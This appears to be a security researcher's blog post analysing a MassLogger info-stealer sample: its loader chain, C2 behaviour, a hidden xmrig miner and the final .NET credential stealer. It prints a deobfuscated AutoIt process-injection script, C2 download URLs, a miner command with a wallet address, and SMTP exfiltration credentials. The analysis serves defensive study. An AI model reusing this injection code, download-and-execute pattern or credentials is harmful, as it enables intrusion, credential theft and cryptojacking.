Eyes on Security

MassLogger is an information-stealing malware designed to capture credentials, keystrokes, and clipboard data from victims. It has been gaining prevalence in the threat landscape, with campaigns of various sizes and victimology observed worldwide. (Yes, I copied this from Broadcom lol)

Anyway, as usual I was browsing MalwareBazaar, looking for fresh malware, and the one that caught my eye was a MassLogger-tagged batch file.

There are more example MassLogger executables uploaded by lowmal3, but I chose this one to analyze because the others were almost the same, and some of them were .NET executables, which is an old technique used by MassLogger.

Malware Flow

Anyway, as usual I was browsing MalwareBazaar, looking for fresh malware, and the one that caught my eye was a MassLogger-tagged batch file.

This is the malware flow I created while analyzing the sample:

Note: To be clear, all these executables are injected into different legitimate applications and executed as new threads. I don't want to repeat this every time.

Initial Analysis

At the top, you can see a binary file named "sqNnY.bin" - this will be our main target in this analysis. But first, I want to explain what the other exe files do.

Starting with the decrypted "aLlTeucWnrhechxHC.bin", it first checks for debuggers and performs simple VM detection (it's too easy to detect and bypass).

Next, an "installer" is downloaded and executed. It drops new files and executes the au3 file. The last au3 file was the most obfuscated one, but it's not really difficult to deobfuscate:

#cs
$vkkiihtobf = \nwekwowlwhwcogczoft
$nticu = C:\Windows\System32\charmap.exe
$cwipirw = kernel32.dll
$gsnfwdmcztclwcovhkqgi = OpenProcess
$gdixmilpmsosbp = VirtualAllocEx
$jecokuozjfa = WriteProcessMemory
$nhybphxljwzq = CreateRemoteThread
$rjhkweazp = CloseHandle
$fosxprdysmayinrykddwmelktkhpm = handle
$zixjs = dword
$xkitfxhddsbtsyuxw = bool
$lbcideknmrnsazvfazvjqox = ptr
$gbjoxnfcmfxrj = ulong_ptr
$gejrlpqkrcxnxubmbxdu = struct*
$buwqyl = dword*
$gvbdvltraydirvkh = byte[
$kplaadznpnfjmbmdfevat = ]
$mbklctvdfrnfgjakgsbqgx = 0x1F0FFF
$hnxremrogwsdjpoags = 0x3000
$invhvdcuydydlonc = 0x40
#ce

Global $pjbhqshpkkrdxsjiyzikstcp = FileOpen(@ScriptDir & $vkkiihtobf, 16)
Global $ewwhytiyydkuc = FileRead($pjbhqshpkkrdxsjiyzikstcp)
FileClose($pjbhqshpkkrdxsjiyzikstcp)

Global $mkzfc = BinaryLen($ewwhytiyydkuc)
If $mkzfc = 0 Then Exit

Global $mleqiqnnnbwglgehhkicmgaklppajh = DllStructCreate($gvbdvltraydirvkh & $mkzfc & $kplaadznpnfjmbmdfevat)
DllStructSetData($mleqiqnnnbwglgehhkicmgaklppajh, 1, $ewwhytiyydkuc)
For $rpmvy = 1 To $mkzfc
    DllStructSetData($mleqiqnnnbwglgehhkicmgaklppajh, 1, BitXOR(DllStructGetData($mleqiqnnnbwglgehhkicmgaklppajh, 1, $rpmvy), 185), $rpmvy)
Next

Global $yapoagjwmurj = Run($nticu, "", @SW_HIDE)
Global $lshbtrvzmznfktftandgtxfwse = DllCall($cwipirw, $fosxprdysmayinrykddwmelktkhpm, $gsnfwdmcztclwcovhkqgi, $zixjs, $mbklctvdfrnfgjakgsbqgx, $xkitfxhddsbtsyuxw, False, $zixjs, $yapoagjwmurj)[0]
Global $ynvhvx = DllCall($cwipirw, $lbcideknmrnsazvfazvjqox, $gdixmilpmsosbp, $fosxprdysmayinrykddwmelktkhpm, $lshbtrvzmznfktftandgtxfwse, $lbcideknmrnsazvfazvjqox, 0, $gbjoxnfcmfxrj, $mkzfc, $zixjs, $hnxremrogwsdjpoags, $zixjs, $invhvdcuydydlonc)[0]

DllCall($cwipirw, $xkitfxhddsbtsyuxw, $jecokuozjfa, $fosxprdysmayinrykddwmelktkhpm, $lshbtrvzmznfktftandgtxfwse, $lbcideknmrnsazvfazvjqox, $ynvhvx, $gejrlpqkrcxnxubmbxdu, $mleqiqnnnbwglgehhkicmgaklppajh, $gbjoxnfcmfxrj, $mkzfc, $lbcideknmrnsazvfazvjqox, 0)
Global $zsingslima = DllCall($cwipirw, $fosxprdysmayinrykddwmelktkhpm, $nhybphxljwzq, $fosxprdysmayinrykddwmelktkhpm, $lshbtrvzmznfktftandgtxfwse, $lbcideknmrnsazvfazvjqox, 0, $gbjoxnfcmfxrj, 0, $lbcideknmrnsazvfazvjqox, $ynvhvx, $lbcideknmrnsazvfazvjqox, 0, $zixjs, 0, $buwqyl, 0)[0]

If $zsingslima Then DllCall($cwipirw, $xkitfxhddsbtsyuxw, $rjhkweazp, $fosxprdysmayinrykddwmelktkhpm, $zsingslima)
DllCall($cwipirw, $xkitfxhddsbtsyuxw, $rjhkweazp, $fosxprdysmayinrykddwmelktkhpm, $lshbtrvzmznfktftandgtxfwse)

The comment section was added by me, and I removed other decryption parts to make it clear. This au3 script will execute our last exe file named "nwekwowlwhwcogczoft".

C2 Component Analysis

"nwekwowlwhwcogczoft" is a simple C2 that can perform three operations: "exit", "update", and "stealer".

Simple and Clear Flow:

Checks if the "Software\rub" registry key exists. If not, tries to download "http://176.98.187.46:1778/stealer"
Checks if the size of "stealer" is more than 1,000,000 bytes. If yes, executes it; otherwise, passes
If "Software\rub" wasn't created, creates it
Checks if a file named "paygab" exists in %LOCALAPPDATA%. If so, XORs it with "0x60" and executes it
If "paygab" doesn't exist, downloads "http://176.98.187.46:1778/miner" and executes it
The miner checks if "sigverif.exe" is running. If so, terminates it
Opens a new "sigverif.exe" process, allocates space, and writes the open-source project xmrig to enable mining
Executes the command:

C:\\Windows\\System32\\sigverif.exe --algo=rx/0 --url=gulf.moneroocean.stream:10001 --user=47GrvVWRXX9CbpQ7WKAqR1fP1fEYJpurvj8pAkF8FcgcUJTFi5KpTAmWxv4modTHTMNXZXSxa8K8SijdVHDiAUs69xgSt MY --pass=x --threads=2"

Note: This is a new malware sample, as I was the first person to submit this sample to VirusTotal and Malware Bazaar

Going back to "nwekwowlwhwcogczoft", after attempting these operations, it checks the machine's status using the InternetOpenUrl API with "http://176.98.187.46:1778/heartbeat?userID=xxxx-xxxxx-xxxxx-xxxx" (userID is your machine's GUID fetched from the registry) and uses the InternetReadFile API to check for new commands from the C2. As mentioned, there are three commands: "stealer"/"custom" (same thing), "exit", and "update"
Why can "stealer/custom" be given? Because the one downloaded earlier was actually a decoy with a smaller size than required (Why do this? To hide their project)
The other two commands, "exit" and "update", are self-explanatory

Possible Attack Scenarios:

The fake stealer is designed to waste time for reverse engineers/malware analysts
It only provides the real stealer to trusted (real victim) machines by analyzing their behavior. For example, I acted differently than usual machines while analyzing - requesting files multiple times without checking heartbeat, etc. The attacker might choose which machines receive the real stealer (most realistic scenario)

This concludes the analysis of the "nwekwowlwhwcogczoft" executable.

Main Payload Analysis

The real deal was actually "sqNnY.bin". Ironically, I initially thought this was junk code to waste our time, but it's actually the main component of the malware. After XORing it with the key, even when you check the file type, it says "not a PE file." There's also no "MZ" signature at the first two bytes of the file.

After some OSINT research, I discovered that the pe_to_shellcode project was used for this transformation - a free but powerful tool.

"The goal of this project is to provide a possibility to generate PE files that can be injected with minimal effort. It is inspired by Stephen Fewer's ReflectiveDLLInjection - but the difference is that with pe2shc you can add the reflective loading stub post-compilation. Also, the header of the PE file is modified in such a way, that you can start executing the injected buffer from the very beginning - just like you would do with a shellcode. It will automatically find the stub, and continue loading the full PE."

The point is, it makes zero sense when you look at the file - it's just a bunch of bytes. There's literally not a single string, not even "This program cannot be run in DOS mode" (because it's shellcode, not PE). However, it's possible to manually extract the malware. It wasn't that difficult since I could find some APIs used by the shellcode, like VirtualAlloc, memset, etc.

I was able to extract the malware and check it on VirusTotal. I was the first person to submit this sample as well: Malware Bazaar and VirusTotal

It's a .NET 32-bit executable with zero encryption. The funny part is that the malware developers chose this as their signature:

Final Payload Capabilities

Since it's not encrypted or obfuscated, I'll simply list what it can do:

Expiration Check: Checks if the user (victim) is expired by comparing the current time to "2025-02-15" (exits if expired)
Placeholder Functions: Runs through three empty functions, probably not implemented by the malware developer yet:
- UltraSpeed.Taskmgr_Disabler();
- UltraSpeed.CMD_Disabler();
- UltraSpeed.Registeries_Disabler();
Data Theft: Attempts to steal data from these browsers:

Chrome_Speed, Torch_Speed, CocCoc_Speed, QQ_Speed, xVast_Speed, QIPSurf_Speed, 
Microsoft_Speed, Chromium_Speed, Blisk_Speed, Brave_Speed, Nichrome_Speed, 
Kometa_Speed, Superbird_Speed, Opera_Speed, Comodo_Speed, Cent_Speed, 
Chedot_Speed, Ghost_Speed, Iron_Speed, UC_Speed, BlackHawk_Speed, Citrio_Speed, 
Uran_Speed, Falkon_Speed, Sputnik_Speed, CoolNovo_Speed, Chrome_Canary_Speed, 
Sleipnir_Speed, Kinzaa_Speed, Amigo_Speed, Epic_Speed, e360_English_Speed, 
e360_China_Speed, Vivaldi_Speed, Xpom_Speed, orbitum_Speed, Iridium_Speed, 
SevinStar_Speed, Outlook_Speed, Foxmail_Speed, FireFox, SeaMonkey, IceDragon, 
Thunderbird, FileZilla_Speed, WindowsKey_Speed

Data Exfiltration: Sends stolen data (usernames and passwords) using these credentials:

private static string Host_Sender = "voiper@tamre.it";
private static string Host_Password = "KFRKgMrNoiIF";
private static string Host_Server = "mailserver12.vhosting-it.com";
private static string Host_Receiver = "remiset@remisat.com.uy";
private static string Host_Port = "465";

The exfiltrated data includes PC information, client name, date/time, IP address, and country information along with the stolen credentials.

That concludes this analysis of the MassLogger malware sample.